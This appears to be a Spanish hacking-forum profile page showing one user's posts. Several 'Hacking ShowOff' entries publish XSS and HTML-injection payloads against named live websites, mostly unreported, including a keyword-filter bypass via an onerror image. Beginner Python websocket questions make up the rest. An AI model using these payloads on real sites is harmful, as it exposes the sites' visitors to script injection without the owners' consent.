Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - Pytness

Páginas: [1]
1
Hacking ShowOff / [XSS] pcxeon.com
« en: Julio 15, 2017, 07:47:48 pm »


URL: https://www.pcxeon.com/buscar.php?filtro=
Vector: '"><svg onload=alert('pytness')>
Reportado: No

2
Dudas y pedidos generales / Rotacion de pantalla [KALI]
« en: Abril 12, 2017, 06:10:31 pm »
Acabo de instalar Kali en una particion aparte y tras realizar todas las actualizaciones, la pantalla rota de vez en cuando.
Esto lo arreglo facilmente con el comando xrandr -o normal, pero al rato vuelve a rotarse.
Alguien sabe como solucionarlo? o en su defecto, alguien sabe por que sucede?

Gracias.

3
Hacking ShowOff / [XSS] Carta para los reyes magos (www.carta.es)
« en: Diciembre 14, 2016, 08:10:50 am »
Imagenes:


Url: http://carta.es
Vector: <script>alert('XSS\nFrom Pytness\nTo Undercode\nWith Love <3');</script>*
Autor: Pytness
Ejemplo: www.carta.es/carta.php?id=1158511aaa00933
Reportado: No


*Es necesario poner todo el script en una sola linea

4
Hacking ShowOff / [XSS] Web Timo
« en: Octubre 13, 2016, 04:35:50 pm »
Imagen:


Url: http://error0x006-informacion-tecnico-informacion-reparar.s3-website.eu-central-1.amazonaws.com/?n=
Vector: <h1 style="color:red">UNDERCODE And Pytness</h1>
Url + Vector:  http://error0x006-informacion-tecnico-informacion-reparar.s3-website.eu-central-1.amazonaws.com/?n=<h1 style="color:red">UNDERCODE And Pytness</h1>
Autor: Pytness
Reportado: Nope

Aparentemente parece funionar con php, pero lo hace con js. Es decir, si se deshabilita este, el xss no funcionará.

PD:
LA PÁGINA ES UN POCO TOCA NARICES, pero nada que no se pueda arreglar toqueteando un poco :)

Y ya ni comento lo que pone de fondo xD

PD-2:
En el timo original aparecia este numero de telefono: 932 20 23 38. Lo he 'denunciado' en http://www.listaspam.com/report.php.

... y la ip es totalmente falsa :T


5
Buenas, he hecho un script en python 3.5 para realizar una conexión con websockets:
Python 3.5 code:
Código: Python
  1. import base64, hashlib
  2. import socket, threading, time, os
  3.  
  4.  
  5. class Connection:
  6.  
  7.     def __init__(self, HOST, PORT):
  8.         self.HOST = HOST
  9.         self.PORT = PORT
  10.         self.magicKey = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
  11.  
  12.  
  13.     def init(self):
  14.         self.socket = socket.socket()
  15.         self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  16.         self.socket.bind((self.HOST, self.PORT));
  17.         self.socket.listen(1);
  18.         self.conn, self.addr = self.socket.accept();
  19.  
  20.         h = self.conn.recv(1024).decode("utf-8")
  21.         print(h)
  22.         self.conn.send(bytes(self.header(h).encode("utf-8")))
  23.         # threading.Thread(target = self.getData).start()
  24.         threading.Thread(target = self.getData).start()
  25.  
  26.     def getKey(self, msg):
  27.         msg = msg.split("\r\n")
  28.         for x in msg:
  29.             if x.count("Sec-WebSocket-Key") != 0:
  30.                 key = x.split(" ")[1]
  31.                 hash = hashlib.sha1()
  32.                 hash.update(bytes((key + self.magicKey).encode("utf-8")))
  33.                 return base64.b64encode(hash.digest()).decode("utf-8")
  34.  
  35.     def header(self, msg):
  36.         finalKey = self.getKey(msg)
  37.         print(finalKey)
  38.  
  39.         header = "HTTP/1.1 101 Switching Protocols\r\n"
  40.         header += "Upgrade: websocket\r\n"
  41.         header += "Connection: Upgrade\r\n"
  42.         header += "Sec-WebSocket-Accept: " + finalKey + "\r\n"
  43.         header += "\r\n"
  44.         return header
  45.  
  46.     def getData(self):
  47.         while True:
  48.             data = self.conn.recv(1024)
  49.             print(str(data))
  50.  
  51.     def sendData(self):
  52.         # while True:
  53.         enviar = bytes("Test \n".encode("utf-8"))
  54.         self.conn.sendall(enviar)
  55.  
  56. connection = Connection("localhost", 7899)
  57. connection.init()
  58.  

JS Code:
Código: Javascript
  1. function send(data) {
  2.    ws.send(data);
  3. }
  4.  
  5. var op = document.getElementById("output");
  6. op.innerHTML = '';
  7.  
  8. ws = new WebSocket('ws://localhost:7899');
  9.  
  10. ws.onopen = function (evt) {
  11.    op.innerHTML += "Open <br>";
  12.    send("test")
  13. };
  14. ws.onclose = function (evt) {
  15.    op.innerHTML += "Closed <br>";
  16. };
  17. ws.onmessage = function (evt) {
  18.    op.innerHTML += "<pre>" + evt.data + "</pre><br>";
  19. };
  20. ws.onerror = function (evt) {
  21.    op.innerHTML += "Error <br>";
  22. };
  23.  
  24.  

E aquí la respuesta que obtengo en la consola al conectarme:
Código: [Seleccionar]
GET / HTTP/1.1

Host: localhost:7899

Connection: Upgrade

Pragma: no-cache

Cache-Control: no-cache

Upgrade: websocket

Origin: file://

Sec-WebSocket-Version: 13

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36

DNT: 1

Accept-Encoding: gzip, deflate, sdch

Accept-Language: es-ES,es;q=0.8

Sec-WebSocket-Key: rrbq+deqlkTqFTSZ4qEyGQ==

Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits




TAPFySA27bL6vQ7S8bsd4ve14ZY=
b'\x81\x84\x95\x91P\x05\xe1\xf4#q'

El problema está en que yo mando con js 'test' y recibo b'\x81\x84\x95\x91P\x05\xe1\xf4#q' en consola.
He intentado decodificarlo a utf-8 pero da error.

Espero que sepan y puedan ayudarme.
Gracias.

-Pytness

6
Hacking ShowOff / [XSS] http://espinillo.org
« en: Septiembre 08, 2016, 09:26:02 pm »
Imagen:


Url: espinillo.org - (espinillo.org/foros/nuevotem.php?foro=16) - foro=(1-30)
Vector: '<h1 style="color: #ff001b">Underc0de</h1>' *
Autor: Pytness
Reportado: Si**

* Detecta varias palabras, tales como 'script', 'alert', 'write', 'getElementById'... Validacion Back-End, muestra una alerta de error.
-* Añadiendo una imagen con un src nulo y un onerror podemos cargar un script.

**
Lo reporte hace meses y añadieron un 'filtro' de palabras (*). Lo he vuelto a reportar.

7
Dudas y pedidos generales / Problema con sockets y demas
« en: Septiembre 06, 2016, 07:46:12 pm »
Buenas.
Estoy haciendo a modo de aprendizaje un 'chat' (en Python 3.5.2) en el que utilizo hilos, websockets, sockets y 'asyncio'.

Para hacer la interfaz utilizo HTML y JS, que conecto a la consola mediante websockets. Estos son asíncronos, y los 'manejo' con un hilo.
Desde los websockets paso los datos a los sockets y estos se mandan al server.

[HTML + JS] <-> WebSockets <-> Sockets <-> Server



[Parte de websockets]

El problema es este:
Código: [Seleccionar]
import asyncio
import threading
import websockets

async def server(websocket, path):

   threading.Thread(target=sendData, args=(websocket, path)).start()
    threading.Thread(target=getData, args=(websocket, path)).start()

   # await getData(websocket, path)
   # await sendData(websocket, path)



async def getData(websocket, path):
      await print(websocket.recv())
      await asyncio.sleep(0.1)
   

def sendData(websocket, path):
   while True:
      websocket.send("data")
      asyncio.sleep(0.5)

start_server = websockets.serve(server, 'localhost', 7979)

asyncio.get_event_loop().run_until_complete(start_server)
asyncio.get_event_loop().run_forever()


Este código me da error al pasarle los argumentos en el hilo en el que invoco a getData().
#El sendData() esta sin el async para comprobar que falla

Son los argumentos requeridos, pero me dice que no se esperan y que espera dos argumentos :/

Creo que es debido a la forma de pasarle los argumentos al async desde el hilo.
El problema es que no se como pasárselos bien.

Podrian explicarme como solucionar esto?

Gracias.


Postdata: siento si este post esta mal colocado y si tengo algun error de novato, ya que lo soy :]

Páginas: [1]